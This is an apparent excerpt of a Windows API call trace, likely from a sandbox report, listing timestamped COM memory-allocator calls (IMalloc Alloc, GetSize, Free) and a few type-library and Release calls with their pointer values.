[0031.312] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.312] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.313] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.313] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.313] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.313] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.313] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.313] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.313] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.313] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.313] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.313] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.313] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.313] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.314] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.314] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.314] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.314] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491a50) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb4917d0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb4915d0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb4918d0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491530) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491670) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491510) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491950) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491a30) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb4916b0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491870) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491650) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491a10) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491010) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491a90) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb4918f0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491ab0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491450) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb4917f0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491550) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491930) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491370) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491430) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491770) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491810) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491910) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb4919f0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491390) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb491710) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb490fb0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe80) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x76665d0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x76665a0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x76dbec0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x7666570) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe40) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x7666540) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x76664e0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x76664b0) [0031.314] IMalloc:Free (This=0x7fefe015380, pv=0x7666630) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666660) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666690) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76666c0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76666f0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666750) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666780) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76667b0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe00) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76667e0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666810) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666840) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76668a0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76668d0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666900) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666930) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666960) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666990) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76669f0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc80) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc40) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76dbd40) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76dbbc0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666a50) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666a80) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc00) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76db7c0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666ab0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666ae0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666b10) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666b70) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666ba0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76dba00) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76db480) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666bd0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666c00) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7667680) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb80) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb40) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666f60) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7667020) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7667110) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666e70) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666de0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666db0) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666d50) [0031.315] IMalloc:Free (This=0x7fefe015380, pv=0x7666d20) [0031.315] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbb40 [0031.315] IMalloc:Alloc (This=0x7fefe015380, cb=0x34) returned 0x76dbb80 [0031.315] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666d20 [0031.315] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666d50 [0031.315] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666db0 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666de0 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666e70 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7667110 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7667020 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666f60 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667680 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fb0 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491390 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919f0 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491910 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491810 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491770 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491430 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491930 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491550 [0031.316] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e68c0 [0031.316] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e68c0) returned 0x40 [0031.317] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e68c0 [0031.317] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e68c0) returned 0x40 [0031.317] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.318] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.318] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917f0 [0031.318] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917f0) returned 0x10 [0031.318] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e68c0 [0031.318] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e68c0) returned 0x40 [0031.318] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4917f0 [0031.318] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917f0) returned 0x18 [0031.318] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917f0 [0031.319] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917f0) returned 0x10 [0031.319] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4917f0 [0031.319] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917f0) returned 0x18 [0031.319] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666c00 [0031.319] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c00) returned 0x28 [0031.319] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666c00 [0031.319] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c00) returned 0x28 [0031.319] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666c00 [0031.319] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c00) returned 0x28 [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb490fb0) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb491710) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb491910) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb491550) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb491930) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb491370) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb491430) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb491770) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb491810) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb4919f0) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb491390) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb40) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb80) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x7666d20) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x7666d50) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x7666db0) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x7666de0) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x7666e70) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x7667110) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x7667020) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x7666f60) [0031.320] IMalloc:Free (This=0x7fefe015380, pv=0x7667680) [0031.320] ITypeInfo:GetImplTypeFlags (in: This=0xb4cea30, index=0x0, pImplTypeFlags=0x2e6948 | out: pImplTypeFlags=0x2e6948*=1) returned 0x0 [0031.320] IUnknown:Release (This=0x780bc48) returned 0x2 [0031.320] ITypeInfo:GetImplTypeFlags (in: This=0xb4cea30, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.320] IUnknown:Release (This=0x780c608) returned 0x2 [0031.320] IUnknown:Release (This=0xb4cd900) returned 0x1 [0031.320] IUnknown:Release (This=0xb4ce9d8) returned 0x1 [0031.320] IUnknown:Release (This=0xb4cea30) returned 0x1 [0031.320] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ceae0) returned 0x0 [0031.320] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbb80 [0031.320] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7667680 [0031.320] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666f60 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbb40 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7667020 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76db480 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7667110 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666e70 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666de0 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666db0 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666d50 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dba00 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76db7c0 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666d20 [0031.321] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666c00 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666bd0 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666ba0 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666b70 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666b10 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666ae0 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666ab0 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbc00 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbbc0 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666a80 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666a50 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76669f0 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666990 [0031.322] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666960 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666930 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666900 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76668d0 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76668a0 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbd40 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbc40 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbc80 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbe00 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666840 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666810 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbe40 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76667e0 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76667b0 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666780 [0031.323] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666750 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76666f0 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76666c0 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666690 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666660 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666630 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76664b0 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbec0 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbe80 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbf00 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbf40 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76664e0 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666540 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666570 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76665a0 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbf80 [0031.324] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbfc0 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc000 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc040 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76665d0 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666090 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666cf0 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666060 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666c60 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666450 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666480 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x766d2c0 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc080 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc0c0 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76660f0 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666150 [0031.325] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc100 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc140 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666180 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76661b0 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc180 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc1c0 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76661e0 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666210 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666270 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76662a0 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76662d0 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666300 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x36) returned 0x76dc200 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x36) returned 0x76dc240 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc300 [0031.326] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc2c0 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc280 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc340 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666360 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666390 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76663c0 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666f90 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666ea0 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7667050 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76660c0 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666ff0 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666000 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7665fd0 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7665fa0 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491390 [0031.327] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7665f70 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7665f40 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7665f10 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x36) returned 0x76dc380 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x36) returned 0x76dc3c0 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc400 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc440 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc480 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919f0 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491810 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491770 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491430 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491930 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491550 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491910 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fb0 [0031.328] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917f0 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491450 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ab0 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918f0 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491010 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a10 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491650 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491870 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916b0 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a30 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491950 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491510 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491670 [0031.329] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491530 [0031.331] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4917b0 [0031.331] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917b0) returned 0x18 [0031.337] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.337] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.337] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.337] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.337] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917b0 [0031.337] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917b0) returned 0x10 [0031.337] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7665eb0 [0031.337] IMalloc:GetSize (This=0x7fefe015380, pv=0x7665eb0) returned 0x20 [0031.338] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc4c0 [0031.338] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dc4c0) returned 0x30 [0031.338] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e6a00 [0031.338] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e6a00) returned 0x48 [0031.338] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917b0 [0031.338] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917b0) returned 0x10 [0031.339] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.339] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.339] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917b0 [0031.339] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917b0) returned 0x10 [0031.339] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.339] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.339] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917b0 [0031.339] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917b0) returned 0x10 [0031.339] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.339] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.340] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917b0 [0031.340] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917b0) returned 0x10 [0031.340] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.340] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.340] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917b0 [0031.340] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4917b0) returned 